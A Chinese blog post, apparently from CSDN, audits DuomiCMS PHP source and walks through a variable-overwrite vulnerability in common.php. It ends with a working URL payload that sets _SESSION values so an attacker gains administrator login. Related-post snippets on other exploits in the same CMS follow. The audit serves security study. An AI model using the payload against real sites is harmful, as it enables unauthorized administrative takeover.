Duomicms变量覆盖

最新推荐文章于 2023-03-23 17:20:35 发布
最新推荐文章于 2023-03-23 17:20:35 发布
阅读量328 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46168828/article/details/105600306
版权

https://blog.csdn.net/weixin_43415644/article/details/94064059
https://www.cnblogs.com/Qiuzhiyu/p/11923471.html

先查看index.php

require_once ("duomiphp/common.php");
require_once duomi_INC."/core.class.php";
//站点状态

在duomiphp/common.php的变量覆盖漏洞

foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
	foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v);
}

可以接受GET,POST,COOKIE这三种

foreach($_REQUEST as $_k=>$_v)
{
	if( strlen($_k)>0 && m_eregi('^(cfg_|GLOBALS)',$_k) && !isset($_COOKIE[$_k]) )
	{
		exit('Request var not allow!');
	}
}

有传参,正则匹配没有cfg_或GLOBALS,cookie没值
看它调用的函数,是对字符串进行转义

function _RunMagicQuotes(&$svar)
{
	if(!get_magic_quotes_gpc())
	{
		if( is_array($svar) )
		{
			foreach($svar as $_k => $_v) $svar[$_k] = _RunMagicQuotes($_v);
		}
		else
		{
			$svar = addslashes($svar);
		}
	}
	return $svar;
}

get_magic_quotes_gpc — 获取当前 magic_quotes_gpc 的配置选项设置
当 magic_quotes_gpc=On 时,
如果输入的数据有单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线。
当magic_quotes_gpc=Off 时,
系统不会自动对单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符增加反斜线,需要手工调用函数addslashes这个函数来为字符串增加转义。

查看login.php

require_once(dirname(__FILE__).'/../duomiphp/common.php');
require_once(duomi_INC."/check.admin.php");

去查看check.admin.php

var $keepUserIDTag = "duomi_admin_id";
	var $keepgroupidTag = "duomi_group_id";
	var $keepUserNameTag = "duomi_admin_name";

	//php5构造函数
	function __construct($admindir='')
	{
		global $admin_path;
		if(isset($_SESSION[$this->keepUserIDTag]))
		{
			$this->userID = $_SESSION[$this->keepUserIDTag];
			$this->groupid = $_SESSION[$this->keepgroupidTag];
			$this->userName = $_SESSION[$this->keepUserNameTag];
		}

需要给session传值,使用$_SESSION需要先调用session_start,在interface/comment.php下

session_start();
require_once("../duomiphp/common.php");
require_once(duomi_INC.'/core.class.php');

要找给session传的值,全局搜索groupid,在admin_manager.php找到需要等于1获得管理员权限

function getManagerLevel($groupid)
{
	if($groupid==1){
		return "系统管理员";
	}else if($groupid==2){
		return "网站编辑员";
	}else{
		return "未知类型";
	}
}

interface/comment.php?_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&_SESSION[duomi_admin_name]=admin
在这里插入图片描述
去后台(默认/admin)可以直接登录
在这里插入图片描述

ssion_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
多米cmsduomicms变量覆盖漏洞(超详细)
kiwi的博客
11-01 825
本文章我借鉴了代码审计实战 - FreeBuf网络安全行业门户的文章,文章写的比较详细,大家也可以看看他写的文章。
Duomicms变量覆盖漏洞
B_roin的博客
04-19 590
变量覆盖 1.变量覆盖是指可以用我们的传参值替换程序原有的变量值 2.经常导致变量覆盖漏洞场景有:$$(可变变量)使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局变量注册等 1 . extract()函数:从数组中将变量导入到当前的符号表 (来源:菜鸟教程) [该函数使用数组键名作为变量名,使用...
Duomicms_X2.0变量覆盖通杀漏洞复现
seek_2022的博客
07-13 1656
出于学习和技术分享的目的撰写了本文,希望能给读者们学习挖掘此类漏洞提高一点参考。
[zkaq靶场]变量覆盖--duomi cms通杀漏洞
wwxxee
05-12 984
变量覆盖 变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。 经常导致变量覆盖漏洞场景有: $$使用不当; extract()函数使用不当; parse_str()函数使用不当; import_request_variables()使用不当,开启了全局变量注册等。 $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。 例如: <?php
DuoMiCms资源采集插件 v3.1
12-04
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。 重要提示: 200在线资源和C值部分需要解析。... 使用说明: 将文件api.php 覆盖至admin文件夹即可! DuoMiCms资源采集
DuoMiCms资源采集插件 v2.0
12-05
DuoMiCms资源采集插件是一个基于多米cms影视管理系统,而进行开发的自动采集插件。
duomicms代码审计1
08-03
Duomicms 代码审计是一个重要的安全实践,目的是发现潜在的安全漏洞和编码问题。在这个特定的审计过程中,我们关注了几个关键点,它们涉及到系统运行的流程、文件结构、以及对外部输入的处理。 首先,审计从程序...
DuomiCms 多米影视管理系统 X2.0
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
多米(DuomiCms)影视管理系统 X1.1
11-27
DuomiCms采用PHP+MYSQL架构原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其
多米(DuomiCms)影视管理系统PHP版X2.0
07-25
DuomiCms采用PHP MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持主分类,扩展分类,剧情分类三种分类方式,让网站内容与众不同。简单易用丰富的模板标签,方便网站模
【网络安全】Duomicms变量覆盖漏洞从白盒测试到实战
HBohan的博客
04-22 1771
声明:本次实践是在合法授权情况下进行,数据已经全部加密,主要是提供思路交流学习,请勿用于任何非法活动,否则后果自负。 本地代码走查 本次白盒代码测试的cmsDuomiCms,这次使用Seay工具进行代码审查,下载DuomiCms源码,然后工具加载。 先全局搜索危险函数,依次排查; extract();//把数组编程变量 parser_str();//把字符串变成变量 $$; //可变变量,将变量的值读出来然后再赋值为变量 在函数定位后,在文件中依次寻找有通用性的文件后缀内容,如下所示; //此类后.
DuomiCms x3.0前台duomiphpajax.php SQL注入漏洞审计复现
RestoreJustice的博客
03-23 239
语句使用了拼接,而拼接用的变量又多数是全局变量,我们在前面的代码执行漏洞中,提到程序有注册变量的行为,这样容易造成变量覆盖。拼接在SQL语句的末尾,且没有被引号包裹。非常好利用,但是对id变量进行了类型判断,必须是数字,所以没办法直接利用。变量,该变量为全局变量,可以由用户控制,而且其位置在SQL语句最后,两边也没有引号包裹,很好利用。语句,会先经过下面的正则,这里过滤了一些特殊语法,不允许我们使用联合查询。变量在SQL语句中被引号包裹了,如果引入注释符号话,会触发。来代替,最后取第二个引号之后的内容给。
php _runmagicquotes,PHP函数第30款:转义字符函数_RunMagicQuotes
weixin_39572168的博客
03-11 309
一:函数简介此函数的作用是为所有的 ' (单引号), \" (双引号), \\ (反斜线) and 空字符和以会自动转为含有反斜线的转义字符。二:函数源码该函数的作用指的是:1、如果没有启用魔术引号 get_magic_quotes_gpc ,才会执行下边对数组和字符串的转义。当然,如果启用了就不使用该函数了。2、下边遇到数组,遍历数组取值;3、如果遇到字符串>0并且不含 cfg_|GLOB...
齐博CMS变量覆盖导致sql注入漏洞分析
55的专栏
03-11 1655
齐博CMS变量覆盖导致sql注入漏洞分析 漏洞具体详情见http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.AooULy&id=13。 1. 根据阿里文章会员中心评论管理member/comment.php中存在变量cidDB未初始化,所以从此处开始利用对评论批量删除,抓包查看 2.exp利用全局变量$_FILES的注册变量
代码审计duomicms变量覆盖漏洞
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-16 654
变量覆盖漏洞 什么是变量覆盖变量覆盖指的是可以用我们的传参值替换程序原有的变量值 如下 <?php $a=123; $a=1; echo $a; ?> 怎么去寻找变量覆盖? 经常导致变量覆盖漏洞场景有: $$使用不当,extract()函数使用不当,parse_str()函数使用不当import_request_variables()使用不当,开启了全局变量注册等。 经常引发变量覆盖漏洞的函数有:extract() parse_str() import_request_variab
Java项目-基于Springboot+Vue的会员制医疗预约系统设计与实现(源码+数据库脚本+部署视频+代码讲解视频+全套软件
06-19
【基于Springboot+Vue的会员制医疗预约服务管理信息系统的设计与实现】高分通过项目,已获导师指导。 本项目是一套基于Springboot+Vue的会员制医疗预约服务管理信息系统,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者。也可作为课程设计、期末大作业 包含:项目源码、数据库脚本、开发说明文档、部署视频、代码讲解视频、全套软件等,该项目可以直接作为毕设使用。 项目都经过严格调试,确保可以运行! 项目详情: https://blog.csdn.net/u011832806/article/details/138750441
protobuf-3.19.3-cp38-cp38-manylinux2014_aarch64.whl
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
HiMall2.6多用户B2B2C商城源码.zip
06-19
生态级B2B2C盈利模式商业平台。完备的电商功能,为企业提升了行业电商品牌的美誉度。系统安全、稳定、快速,便捷的功能扩展及可以进行二次开发的商城源码,为企业电商业务长线快速发展提供了强有力的保障。 适用企业:各类百货MALL、行业实体市场、电商产业园、行业协会、行业门户网站等。
protobuf-3.19.3-cp310-cp310-win_amd64.whl
最新发布
06-19
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值